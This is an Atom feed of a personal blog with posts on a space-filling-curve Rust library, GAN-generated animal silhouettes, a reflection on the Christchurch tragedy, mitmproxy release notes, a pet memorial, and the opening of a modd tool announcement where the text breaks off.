{"title":"corte.si","link":[{"@attributes":{"href":"https:\/\/corte.si\/atom.xml","rel":"self","type":"application\/atom+xml"}},{"@attributes":{"href":"https:\/\/corte.si\/"}}],"updated":"2026-01-28T00:00:00+00:00","id":"https:\/\/corte.si\/atom.xml","entry":[{"title":"Spacecurve","published":"2026-01-28T00:00:00+00:00","updated":"2026-01-28T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/spacecurve\/announce\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/spacecurve\/announce\/","content":"<p>In 2024, I noticed that I'd let my blog languish. Since the issue was urgent, I\nmade a firm new year's resolution to address the situation in 2025. Which is\nwhy, today, in January 2026, I'm writing this post.<\/p>\n<p>I've just released <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/spacecurve\">spacecurve<\/a>, a new\njust-for-fun space-filling curve project. It's the latest symptom of a long\npreoccupation with these beautiful mathematical objects. Over the years,\nthis preoccupation yielded blog posts like <a href=\"\/posts\/visualisation\/malware\/\">malware\nvisualisations<\/a>, a <a href=\"\/posts\/code\/hilbert\/portrait\/\">portrait of the Hilbert\ncurve<\/a> and tools like\n<a rel=\"external\" href=\"https:\/\/binvis.io\">binvis.io<\/a>. I have a long list of related ideas I never got\nto but have wanted to explore, and the first step is naturally to... rewrite\nit in Rust. This is just a starting point, a base for exploring ideas I have\nabout visualisation, color spaces, and the qualities of the curves themselves.<\/p>\n<p>As part of the rewrite we now have fast base implementations of the curves\nthemselves in the <a rel=\"external\" href=\"https:\/\/crates.io\/spacecurve\">spacecurve<\/a> library, and a\nvisual exploration tool for 2D and 3D curves in the\n<a rel=\"external\" href=\"https:\/\/crates.io\/crates\/scurve\">scurve<\/a> command-line tool. 
Thanks to\n<a rel=\"external\" href=\"https:\/\/egui.rs\">egui<\/a>, the visualiser runs both natively and in the browser.<\/p>\n<p>Click through on the images below to see the web version.<\/p>\n<div class=\"media-grid media-stack\">\n<div class=\"media media-frame\">\n    <a href=\"&#x2F;spacecurve&#x2F;index.html\">\n        <img src=\".&#x2F;2d.png\" alt=\"2D rendering of Spacecurve\"  \/>\n    <\/a>\n\n    \n<\/div>\n<\/div>\n<div class=\"media-grid media-stack\">\n<div class=\"media media-frame\">\n    <a href=\"&#x2F;spacecurve&#x2F;index.html\">\n        <img src=\".&#x2F;3d.png\" alt=\"3D rendering of Spacecurve\"  \/>\n    <\/a>\n\n    \n<\/div>\n<\/div>\n<h2 id=\"installation\">Installation<\/h2>\n<p><strong>spacecurve<\/strong> is a Rust library for generating a variety of space-filling\ncurves, including Hilbert, Peano, Sierpinski, Moore, and Z-order curves.<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">cargo<\/span><span style=\"color: #032F62;\"> add spacecurve<\/span><\/span><\/code><\/pre>\n<p><strong>scurve<\/strong> is a command-line tool for generating and visualizing space-filling\ncurves.<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">cargo<\/span><span style=\"color: #032F62;\"> install scurve<\/span><\/span><\/code><\/pre>\n<p>It includes an egui interface for exploring the curves in 2D and 3D, which you\ncan run like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">scurve<\/span><span style=\"color: #032F62;\"> gui<\/span><\/span><\/code><\/pre><h2 id=\"spacecurve-web\">spacecurve web<\/h2>\n<p>Because egui supports webassembly, I've also deployed the egui app to the 
web.\nAccess it by clicking below, or on any of the images above.<\/p>\n<p><a href=\"\/spacecurve\/index.html\">Web Viewer<\/a><\/p>\n"},{"title":"Generative zoology with neural networks","published":"2020-06-30T00:00:00+00:00","updated":"2020-06-30T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/genzoo\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/genzoo\/","content":"<p>A couple of years ago a paper titled <em><a rel=\"external\" href=\"https:\/\/arxiv.org\/pdf\/1710.10196.pdf\">Progressive Growing of GANs for Improved\nQuality, Stability, and Variation<\/a><\/em>\ncropped up on my reading list. It describes growing <a rel=\"external\" href=\"https:\/\/en.wikipedia.org\/wiki\/Generative_adversarial_network\">generative adversarial\nnetworks<\/a>\nprogressively, starting with low-resolution images, and then building up more\ndetail as training goes on. It got quite a bit of press at the time because the\nauthors used their idea to generate realistic, unique images of human faces.<\/p>\n<div class=\"media\">\n    <a href=\".&#x2F;representative_image_512x256.png\">\n        <img src=\".&#x2F;representative_image_512x256.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Representative images from the <a href='https:\/\/github.com\/tkarras\/progressive_growing_of_gans'>Progressive GANs repo<\/a>\n    <\/div>\n    \n<\/div>\n<p>Looking at these images, it seems like the neural net would have to learn a vast\nnumber of things to be able to do what these networks were doing. Some of this\nseems relatively simple and factual - say, that eye colours should match. But\nother aspects are fantastically complex and hard to articulate. For instance,\nwhat nuances are needed to link the configuration of eyes, mouth and skin\ncreases into a coherent facial expression? 
Of course, I'm anthropomorphising a\nstatistical machine here, and we may be fooled by our intuition - it could turn\nout that there are relatively few working variations, and that the solution\nspace is more constrained than we imagine. Maybe the most interesting thing is\nnot the images themselves, but rather the uncanny effect they have on us.<\/p>\n<p>Some time later, a <a rel=\"external\" href=\"http:\/\/tetzoo.com\/podcast\">favourite podcast of mine<\/a>\nmentioned <a rel=\"external\" href=\"http:\/\/phylopic.org\/\">PhyloPic<\/a>, a database of silhouette images of\nanimals, plants and other lifeforms. Musing along the lines above, I wondered\nwhat would result if you trained a system like the one in the <strong>Progressive\nGANs<\/strong> paper on a very diverse dataset of this sort. Would you just generate\nmany variations of a few known animal types, or would there be enough variation\nto do neural-network driven <a rel=\"external\" href=\"https:\/\/blogs.scientificamerican.com\/tetrapod-zoology\/speculative-zoology-a-discussion\/\">speculative\nzoology<\/a>?\nHowever things played out, I was pretty sure I would get a few good prints for\nmy study wall out of it, so I set out to satisfy my curiosity with an attitude\nof open-minded experimentation.<\/p>\n<div class=\"media\">\n    <a href=\".&#x2F;animated.mp4\">\n        <video autoplay loop muted playsinline src=\".&#x2F;animated.mp4\"><\/video>\n    <\/a>\n    \n    <div class=\"subtitle\">\n        Training from random noise to competence\n    <\/div>\n    \n<\/div>\n<p>I adapted the <a rel=\"external\" href=\"https:\/\/github.com\/tkarras\/progressive_growing_of_gans\">code from the progressive GANs\npaper<\/a>, and trained a\nmodel for 12000 iterations using a Google Cloud instance with 8 NVIDIA K80 GPUs\nover the complete PhyloPic dataset. Total training time, including some false\nstarts and experiments, was 4 days. 
I used the final trained model to produce\n50k individual images, and then spent hours poring over the results,\ncategorising, filtering and collating images. I also did some light editing by\nflipping images to orient creatures in the same direction, because I found this\na bit more visually satisfying. This hands-on approach means that what you see\nbelow is a sort of collaboration between me and the neural net - it did the\ncreative work, and I edited.<\/p>\n<div class=\"media\">\n    <a href=\"butterflies.png\">\n        <img src=\".&#x2F;butterflies-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Flying insects\n    <\/div>\n    \n<\/div>\n<p>The first surprising thing to me was how aesthetically pleasing the results\nwere. Much of this is certainly a reflection of the good taste of the artists\nwho produced the original data. However, there were also some happy accidents.\nFor instance, it seems that whenever the neural net enters uncertain territory -\nwhether it be fiddly bits that it hasn't quite mastered yet or complete flights\nof vaguely biological fantasy - chromatic aberrations begin to enter the\npicture. This is curious, because the input set is entirely in black and white,\nso colour cannot be a learned solution to some generative problem. Any colour\nmust necessarily be a pure artefact of the mind of the machine. Delightfully,\none of the things that consistently triggers chromatic aberrations are the wings\nof flying insects. This means that it generated hundreds and hundreds of\nvariations of evocatively-coloured \"butterflies\" like the ones above. 
I wonder\nif this could be a useful observation - if you train using only black-and-white\nimages, but demand output in full colour, splotches of colour might be a useful\nway to see where the model is still not able to accurately represent the\ntraining set.<\/p>\n<p>The bulk of the output is a huge variety of entirely recognisable silhouettes -\nbirds, various quadrupeds, reams of little gracile theropod dinosaurs,\nsauropods, fish, bugs, arachnids and humanoids.<\/p>\n<div class=\"media\">\n    <a href=\"birds.png\">\n        <img src=\".&#x2F;birds-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Birds\n    <\/div>\n    \n<\/div><div class=\"media\">\n    <a href=\"quadrupeds.png\">\n        <img src=\".&#x2F;quadrupeds-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Quadrupeds\n    <\/div>\n    \n<\/div><div class=\"media\">\n    <a href=\"dinos.png\">\n        <img src=\".&#x2F;dinos-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Dinosaurs\n    <\/div>\n    \n<\/div><div class=\"media\">\n    <a href=\"fish.png\">\n        <img src=\".&#x2F;fish-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Fish\n    <\/div>\n    \n<\/div><div class=\"media\">\n    <a href=\"bugs.png\">\n        <img src=\".&#x2F;bugs-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Bugs\n    <\/div>\n    \n<\/div><div class=\"media\">\n    <a href=\"hominids.png\">\n        <img src=\".&#x2F;hominids-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Hominids\n    <\/div>\n    \n<\/div><h2 id=\"stranger-things\">Stranger things<\/h2>\n<p>Once the known critters have been weeded out, we get to stranger things. One of\nthe questions I had going into this was whether plausible animal body plans that\ndon't exist in nature would emerge - perhaps hybrids of the creatures in the\ninput set. 
Well, with careful search and a helpful touch of pareidolia, I found\nhundreds of quadrupedal birds, snake-headed deer and other fantastical\nmonstrosities.<\/p>\n<div class=\"media\">\n    <a href=\"mutants.png\">\n        <img src=\".&#x2F;mutants-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Monstrosities\n    <\/div>\n    \n<\/div>\n<p>Straying even further into the unknown, the model produced weird abstract\npatterns and unidentifiable entities, all with a vaguely biological, \"life-ish\"\nfeel to them.<\/p>\n<div class=\"media\">\n    <a href=\"fractals.png\">\n        <img src=\".&#x2F;fractals-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Abstract\n    <\/div>\n    \n<\/div><div class=\"media\">\n    <a href=\"interesting.png\">\n        <img src=\".&#x2F;interesting-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Unidentifiable\n    <\/div>\n    \n<\/div><h2 id=\"a-random-sample\">A random sample<\/h2>\n<p>What doesn't come through in the images above is the sheer abundance of\nvariation in the results. I'm having a number of these image sets printed and\nframed, and the effect of hundreds of small, detailed images side by side at\nscale is quite striking. 
To give some idea of the scope of the full dataset, I'm\nincluding one of these prints below - this one is a random sample from the\nunfiltered corpus of images.<\/p>\n<div class=\"media\">\n    <a href=\"large.png\">\n        <img src=\".&#x2F;large-small.jpg\"  \/>\n    <\/a>\n\n    \n<\/div>"},{"title":"Some personal thoughts on our national tragedy","published":"2019-03-19T00:00:00+00:00","updated":"2019-03-19T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/personal\/tragedy\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/personal\/tragedy\/","content":"<div class=\"media\">\n    <a href=\".&#x2F;dunedin_mosque.jpg\">\n        <img src=\".&#x2F;dunedin_mosque.jpg\" alt=\"Outside the Al Huda Mosque\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Outside the Al Huda Mosque near my home (by\n            <a href=https:\/\/www.flickr.com\/photos\/mark_mcguire\/46492088665>Mark McGuire<\/a>)\n    <\/div>\n    \n<\/div>\n<p>A year ago, my wife and I decided to become citizens of New Zealand. Both of our\nsons were born here and are full, native Kiwis. It felt odd for our family not\nto have this in common, and besides, our own connection with New Zealand had\ngrown strong over the happy decade we'd lived here. It was time to take the\nplunge. Forms were filled in, interviews were held, and we were notified\nthat our citizenship ceremony would be on the 8th of February, 2018.<\/p>\n<p>On the day, we were ushered into a hall with a podium and rows of slightly\nuncomfortable stackable chairs. By the time we arrived it was already full of\nour fellow soon-to-be Kiwis, along with their friends and family. Boisterous\nchildren resisted the shushing of their parents, and there was a bit of raucous\nrunning up and down the aisles. Nobody minded. The mood was friendly, expectant,\nand happy. We took our seats next to a young Chinese couple, and behind a family\nfrom the UK. 
Many were wearing splendid traditional dress from their countries\nof origin - Tongan, Chinese, Thai, Indian. I myself wore a business suit,\nsomething I only do under duress. The man in front of me's stiff posture and\noccasional collar-stretching finger showed I wasn't alone. We were all there\nwith common purpose - because we felt the need for a deeper commitment to our\nhome, and perhaps a deeper sense of acceptance in turn.<\/p>\n<p>A dapper, splendid-mustached gentleman took his place at the podium, and the\nhall became silent. He began the kind of speech you would expect: a speech of\nwelcome, about the rights and duties of citizenship, about the solemnity of the\nmoment. It was at this point, in that stuffy hall, in the middle of a somewhat\nmonotonous civil ceremony, that I was suddenly aware of a profound connection\nwith the people around me. I felt, with complete clarity, a golden thread\nlinking me to my wife, to the couple next to us, to the gent running the\nceremony, extending outwards to everyone in the room. I felt the presence of\ngenerations of parents, stretching back in time, working to better the lives of\ntheir families, all their individual journeys leading us here, to this hall at\nthis time. Most of all, I felt the presence of our children - all our children,\nthe children in the room and my children, and their children, and their\nchildren's children, all joined, facing the unknowable future. This built to a\nsort of vision: a great, thronging, thrusting, golden river of humanity,\nmeandering over a dark background. <em>All<\/em> of us together, everyone that has ever\nlived and everyone that ever will, shining ties binding us together each to\neach, all pushing ever forward in humanity's common project. 
For a moment\nbetween breaths, I was in touch with something transcendent, cosmically larger\nthan me, yet something of which my own small fleck of personhood was a necessary\npart.<\/p>\n<p>Afterwards, people congregated in happy, smiling groups, shaking hands and\nhugging, having their first conversations as full citizens. I slipped out the\ndoor at the back of the hall. My wife, who knows me best, followed, holding my\nhand and laughing with kind-hearted amusement at how moist-eyed and emotional I\nwas.<\/p>\n<p>That moment in the hall came back to me when I first read about the atrocity in\nChristchurch. I saw again the open, friendly, hopeful faces of my freshly-minted\nfellow citizens. I felt again the web of love that connects us all in\nfundamental unity. And I was suffused with an aching and overwhelming grief.\nGrief for the victims and their families, my countrymen and countrywomen. But\ngrief also that anyone could have a conception of humanity so small, so narrow,\nand so mean as to lead to an act like this.<\/p>\n<p>In the coming weeks I'll be doing my part in the business of reckoning with our\nnational tragedy, using the tools I have - code, data, and technology. We can\ndo much with these, but we can't go all the way. 
The real work will be to look\nagain at the human aspect of our online communities, which, it has become\nterrifyingly clear, have become an obstacle to recognising our common purpose.<\/p>\n"},{"title":"mitmproxy v1.0.0: Christmas Edition","published":"2016-12-26T00:00:00+00:00","updated":"2016-12-26T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_1_0\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_1_0\/","content":"<div class=\"media\">\n    <a href=\"http:&#x2F;&#x2F;mitmproxy.org\">\n        <img src=\".&#x2F;mitmweb_1_0.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Six years after mitmproxy's first checkin, we've finally released version\n1.0.0 of the project. Our version numbering persisted below 1.0 well into\nthe project's maturity, for reasons that are a tad difficult to explain. My\nmental model of software development is of an eternal pilgrimage - the roadmap\nof possible improvements stretches on forever, and we never quite reach a point\nwhere we look back and feel that we've arrived. From this perspective, it makes\nsense for 1.0 to always be out of reach. Rather than adopting more\n<a rel=\"external\" href=\"http:\/\/www.tex.ac.uk\/FAQ-TeXfuture.html\">transcendental options<\/a>, I've stuck\nwith simply incrementing the minor version with each release. This release sees\ntwo changes in our process. First, we're committing to a much more regular\ncadence, aiming for a new release every two months or so (with minor bugfix and\npatch releases in between). Second, each of these releases will see a major\nversion number increment - this is v1.0, we'll release v2.0 by the end of\nFebruary, and so forth. This retains something of the flavor of our previous\neccentric version numbering strategy by de-emphasizing major version increments\nas flagfall events, without being as restrictive. 
Let the pilgrimage continue.<\/p>\n<p>The project's momentum continues to be excellent - since the last release,\nwe've had 459 commits by 10 contributors, resulting in 104 closed issues and\n172 closed PRs, all in just over 70 days. All this activity has resulted in a\nnumber of very significant developments.<\/p>\n<p>Over the last year, we've done a huge amount of work converting the project\nfrom Python 2 to Python 3. Our previous release straddled the two versions,\nretaining compatibility with Python 2.7. This release is strictly Python3-only.\nWe are now well positioned to take full advantage of things like optional type\nchecking, the new asyncio module and the many small and large interface\nimprovements that Python 3 brings.<\/p>\n<p>Our user interfaces continue to improve by leaps and bounds. The console\ninterface now has a much cleaner core, sports a number of new features like\nflow ordering, and has seen significant speed improvements. We're also finally\nreleasing something we've been cooking up for quite a while - mitmweb, a web\ninterface to mitmproxy. It doesn't have feature parity with the console tool\nyet, but we feel it's ready to step onto the stage as one of our primary\ninterfaces. Since mitmproxy console doesn't run on Windows (yet), mitmweb is\nthe best GUI option for our Windows users for now. We're also improving our\ndistribution mechanisms on Windows, with a new installer package kindly\nprovided by <a rel=\"external\" href=\"http:\/\/bitrock.com\/\">BitRock<\/a>. These two developments together\nmean much better support for our Windows users.<\/p>\n<p>At a protocol level, we're happy to announce that our support for Websockets is\nnow mature, and enabled by default. For the moment, the best way to interact\nwith Websockets traffic is to use our scripting mechanism - we will have\nsupport in the GUIs very soon. On the HTTP\/2 front, the news is mixed. 
We're\nvery happy with the quality of our own implementation of the protocol, but\nwe've discovered that some server implementations still have problems with\ncertain protocol edge cases. Over the last few months we found multiple bugs\naffecting some very prominent websites and CDNs. We are working closely with\nthe affected companies to get these issues fixed - but big wheels turn slowly,\nespecially when it comes to business-critical infrastructure, and all the\nneeded repairs haven't been rolled out yet. This has left us in a bit of a\nquandary - we know that fixes for these issues are imminent, and we believe\nthat the particular problems are idiosyncratic and shouldn't prompt a\nredevelopment of our core to make us bug-for-bug compatible. None the less, the\neffect is that mitmproxy's HTTP2 implementation will currently do unexpected\nthings when talking to large sites like Twitter and Reddit. We've decided to\ndisable HTTP\/2 by default for this release - you can explicitly re-enable it\nusing the <em>--http2<\/em> flag.<\/p>\n<p>Finally, if you're interested in hacking on mitmproxy, now is an excellent time\nto join us. Contributing is simple - pick one of the issues that we've tagged\nas <a rel=\"external\" href=\"https:\/\/github.com\/mitmproxy\/mitmproxy\/issues?q=is%3Aissue+is%3Aopen+label%3Agood-first-contribution\">good first\ncontributions<\/a>,\njoin us on <a rel=\"external\" href=\"https:\/\/slack.mitmproxy.org\/\">Slack<\/a> to discuss your approach, and\nthen send a PR.<\/p>\n<h2 id=\"changelog\">Changelog<\/h2>\n<ul>\n<li>All mitmproxy tools are now Python 3 only! We plan to support Python 3.5 and higher.<\/li>\n<li>Web-Based User Interface: Mitmproxy now officially has a web-based user\ninterface called mitmweb. We consider it stable for all features currently\nexposed in the UI, but it still misses a lot of mitmproxy\u2019s options.<\/li>\n<li>Windows Compatibility: With mitmweb, mitmproxy is now usable on Windows. 
We\nare also introducing an installer (kindly sponsored by BitRock) that\nsimplifies setup.<\/li>\n<li>Configuration: The config file format is now a single YAML file. In most cases,\nconverting to the new format should be trivial - please see the docs for\nmore information.<\/li>\n<li>Console: Significant UI improvements - including sorting of flows by\nsize, type and url, status bar improvements, much faster indentation for\nHTTP views, and more.<\/li>\n<li>HTTP\/2: Significant improvements, but is temporarily disabled by default\ndue to wide-spread protocol implementation errors on some large websites<\/li>\n<li>WebSocket: The protocol implementation is now mature, and is enabled by\ndefault. Complete UI support is coming in the next release. Hooks for\nmessage interception and manipulation are available.<\/li>\n<li>A myriad of other small improvements throughout the project.<\/li>\n<\/ul>\n"},{"title":"mitmproxy v0.18","published":"2016-10-17T00:00:00+00:00","updated":"2016-10-17T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_18\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_18\/","content":"<p>We've just released <a rel=\"external\" href=\"https:\/\/github.com\/mitmproxy\/mitmproxy\/releases\/tag\/v0.18.1\">mitmproxy\nv0.18<\/a>!  Since the\nlast release, the project has had 1399 commits by 40 contributors, resulting in\n217 closed issues and 305 closed PRs, all of this in just over 189 days.<\/p>\n<p>This release is notable for a number of reasons.<\/p>\n<p>First, it contains significant contributions from our three excellent\n<a rel=\"external\" href=\"https:\/\/developers.google.com\/open-source\/gsoc\/\">GSOC<\/a> students this year.\nShadab Zafar worked on Python 3 compatibility and a number of aspects of\nmitmproxy's core. Clemens Brunner and Jason Hao made major improvements to\nmitmweb, the upcoming web-based interface to mitmproxy. 
We loved working with\nthese guys, and hope that they will continue to hack on mitmproxy.<\/p>\n<p>Second, the project has seen some significant internal reorganisation.\nPreviously, we were split over three separate repositories (mitmproxy, netlib\nand pathod). Over time, the practical headaches of keeping everything\nsynchronised started taking a toll, and we decided to amalgamate it all in a\nsingle repo. The most immediate external effect is that installing mitmproxy\n(through, say, \"pip install mitmproxy\") now gets you all of the associated\ntools and libraries, including pathod and pathoc.<\/p>\n<p>Finally, 0.18 will be the last major version of mitmproxy compatible with\nPython 2. The next release will target Python 3.5 only, with all of the 2\/3\ncompatibility cruft stripped out. This is not a decision we took lightly - we\nhave a significant community of developers that have tools based on mitmproxy,\nand we realise this might be painful for some of them. We feel that being able\nto use the full features of Python 3.5 will make the transition worth it. If\nyou have a library or tool based on mitmproxy, you should start planning for a\nconversion now. 
We'd be very happy to help you navigate the transition, so feel\nfree to drop by the <a rel=\"external\" href=\"https:\/\/slack.mitmproxy.org\/\">Slack channel<\/a> to chat to\nthe dev team.<\/p>\n<h2 id=\"changelog\">Changelog<\/h2>\n<ul>\n<li>Python 3 Compatibility for mitmproxy and pathod (Shadab Zafar, GSoC 2016)<\/li>\n<li>Major improvements to mitmweb (Clemens Brunner &amp; Jason Hao, GSoC 2016)<\/li>\n<li>Internal Core Refactor: Separation of most features into isolated Addons<\/li>\n<li>Initial Support for WebSockets<\/li>\n<li>Improved HTTP\/2 Support<\/li>\n<li>Reverse Proxy Mode now automatically adjusts host headers and TLS Server Name Indication<\/li>\n<li>Improved HAR export<\/li>\n<li>Improved export functionality for curl, python code, raw http etc.<\/li>\n<li>Flow URLs are now truncated in the console for better visibility<\/li>\n<li>New filters for TCP, HTTP and marked flows.<\/li>\n<li>Mitmproxy now handles comma-separated Cookie headers<\/li>\n<li>Merge mitmproxy and pathod documentation<\/li>\n<li>Mitmdump now sanitizes its console output to not include control characters<\/li>\n<li>Improved message body handling for HTTP messages:\n<ul>\n<li>.raw_content provides the message body as seen on the wire<\/li>\n<li>.content provides the decompressed body (e.g. 
un-gzipped)<\/li>\n<li>.text provides the decompressed and decoded body<\/li>\n<\/ul>\n<\/li>\n<li>New HTTP Message getters\/setters for cookies and form contents.<\/li>\n<li>Add ability to view only marked flows in mitmproxy<\/li>\n<li>Improved Script Reloader (Always use polling, watch for whole directory)<\/li>\n<li>Use tox for testing<\/li>\n<li>Unicode support for tnetstrings<\/li>\n<li>Add dumpfile converters for mitmproxy versions 0.11 and 0.12<\/li>\n<li>Numerous bugfixes<\/li>\n<\/ul>\n<h2 id=\"contributors-for-this-release\">Contributors for this release<\/h2>\n<ul>\n<li>Aldo Cortesi<\/li>\n<li>Angelo Agatino Nicolosi<\/li>\n<li>BSalita<\/li>\n<li>Brett Randall<\/li>\n<li>Christian Frichot<\/li>\n<li>Clemens Brunner<\/li>\n<li>Cory Benfield<\/li>\n<li>Doug Freed<\/li>\n<li>Drake Caraker<\/li>\n<li>Felix Yan<\/li>\n<li>Israel Blancas<\/li>\n<li>Jason<\/li>\n<li>Jason Pepas<\/li>\n<li>Jonathan Jones<\/li>\n<li>Kostya Esmukov<\/li>\n<li>Linmiao Xu<\/li>\n<li>Manish Kumar<\/li>\n<li>Maximilian Hils<\/li>\n<li>Ryan Laughlin<\/li>\n<li>Sachin Kelkar<\/li>\n<li>Sanchit Sokhey<\/li>\n<li>Schamper<\/li>\n<li>Shadab Zafar<\/li>\n<li>Steven Noble<\/li>\n<li>Steven Van Acker<\/li>\n<li>Tai Dickerson<\/li>\n<li>Thomas Kriechbaumer<\/li>\n<li>Tyler St. 
Onge<\/li>\n<li>Vincent Haupert<\/li>\n<li>Wes Turner<\/li>\n<li>Yoginski<\/li>\n<li>Zohar Lorberbaum<\/li>\n<li>arjun<\/li>\n<li>chhsiao<\/li>\n<li>jpkrause<\/li>\n<li>phackt<\/li>\n<li>redfast<\/li>\n<li>smill<\/li>\n<li>strohu<\/li>\n<li>vulnminer<\/li>\n<\/ul>\n"},{"title":"Hobbes","published":"2016-03-22T00:00:00+00:00","updated":"2016-03-22T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/personal\/hobbes\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/personal\/hobbes\/","content":"<div class=\"media\">\n    <a href=\".&#x2F;hobbes.jpg\">\n        <img src=\".&#x2F;hobbes.jpg\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Eight years ago my wife and I walked into the <a rel=\"external\" href=\"https:\/\/www.catprotection.org.au\/\">Cat Protection\nSociety<\/a> near our house in Sydney on a whim -\njust to look, we assured each other, and <em>most definitely<\/em> not to get another\ncat. Thirty minutes later we emerged with a box containing a tiny ball of\nscraggly orange fluff, a wee kitten we immediately named Hobbes. Circumstances\nhad taken Hobbes away from his mother far too early, and since I was able to work\nfrom home at the time the job of playing surrogate largely fell to me. I fed\nhim, let him perch on my shoulder like a fluffy little malodorous parrot while\nI worked, and cleaned him with a cotton bud after his inept attempts to use the\nlitter tray. He grew from a tiny scrap to a mischievous and energetic kitten,\nand then to a somewhat slothful but very handsome boy. Perhaps because he came\nto us so young, Hobbes never got on with other cats. He preferred the company\nof humans, and considered himself to be as much of a person as anyone else. 
The\nphoto above is him in his natural habitat: draped bonelessly over my lap like a\npurring orange throw-rug, just being part of whatever conversation his humans\nare having.<\/p>\n<p>About a year ago, Hobbes started losing weight. 
Truth be told shedding a few\npounds would probably have done him good, but this was unexplained by any\nchange in his diet. After a series of X-rays and a biopsy we got bad news: he\nhad lymphoma. With chemotherapy he would have a year or so of high-quality life\nleft, but likely not much more. Apart from giving him his daily pills, there\nwas not much we could do. We treated him to his favorite food as often as\nseemed sensible, and watched carefully for the moment when the scales tipped\nand discomfort outweighed the joy in his life.<\/p>\n<p>This morning Zoe and I took Hobbes to the vet one last time. He always hated\nbeing in the cat carrier, and would pace, tense and wide-eyed, ready to spring\nout like a jack-in-the-box when we opened the door. Today, he just seemed tired\nand sore, huddled motionlessly in an uncomfortable-looking crouch. We held him\ntogether as the vet gave him two injections - one to send him gently to sleep,\nand shortly after, another to stop his heart. Afterwards we brought him home\nand buried him under a cherry tree in our garden. Perhaps when spring comes, it\nwill flower orange.<\/p>\n<p>Goodbye, Hobbesy. Your family will miss you. You were a good, good boy.<\/p>\n"},{"title":"modd: a flexible tool for responding to filesystem change","published":"2016-02-11T00:00:00+00:00","updated":"2016-02-11T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/modd\/announce\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/modd\/announce\/","content":"<p>I've just released <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/modd\">modd<\/a>, a new<sup class=\"footnote-reference\"><a href=\"#1\">1<\/a><\/sup> project of\nmine. 
Like its sister project <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/devd\">devd<\/a>, it's\ndistributed as a single, self-contained binary for all major platforms - <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/modd\/releases\">get it\nwhile it's fresh<\/a>.<\/p>\n<p>Modd is a simple tool that's hard to explain pithily. It triggers commands and\nmanages daemons in response to filesystem changes - but that is a\ntechnically-correct mouthful that doesn't really convey how it is used. Part of\nthe problem is that it is extremely flexible. In my projects it runs linters,\ndoes live code compiles, manages infrastructure daemons like databases, runs\ntest instances of projects and is even rendering and live-reloading this blog\npost as I type. Modd replaces parts of tools like <a rel=\"external\" href=\"http:\/\/gulpjs.com\/\">Gulp<\/a>,\n<a rel=\"external\" href=\"http:\/\/gruntjs.com\/\">Grunt<\/a>, <a rel=\"external\" href=\"https:\/\/ddollar.github.io\/foreman\/\">Foreman<\/a> and\n<em>make<\/em>, but it can also augment them. For instance, one of my projects is\nentirely driven by a Makefile, with tasks invoked by modd on change.<\/p>\n<p>At modd's core is a file change detection library that tries to get things\nright for most developer work patterns. It handles temporary files, VCS\ndirectories and many <a rel=\"external\" href=\"https:\/\/twitter.com\/cortesi\/status\/661316050542329856\">pathological behaviors shown by common\neditors<\/a> correctly (or\nat least tries really hard to). The change detection algorithm waits for a lull\nin activity, so that jobs aren't triggered in the middle of progressive\nprocesses like renders and compiles that may touch many files. The result is\nchange detection that is less surprising and more consistent than similar\nprojects out there. 
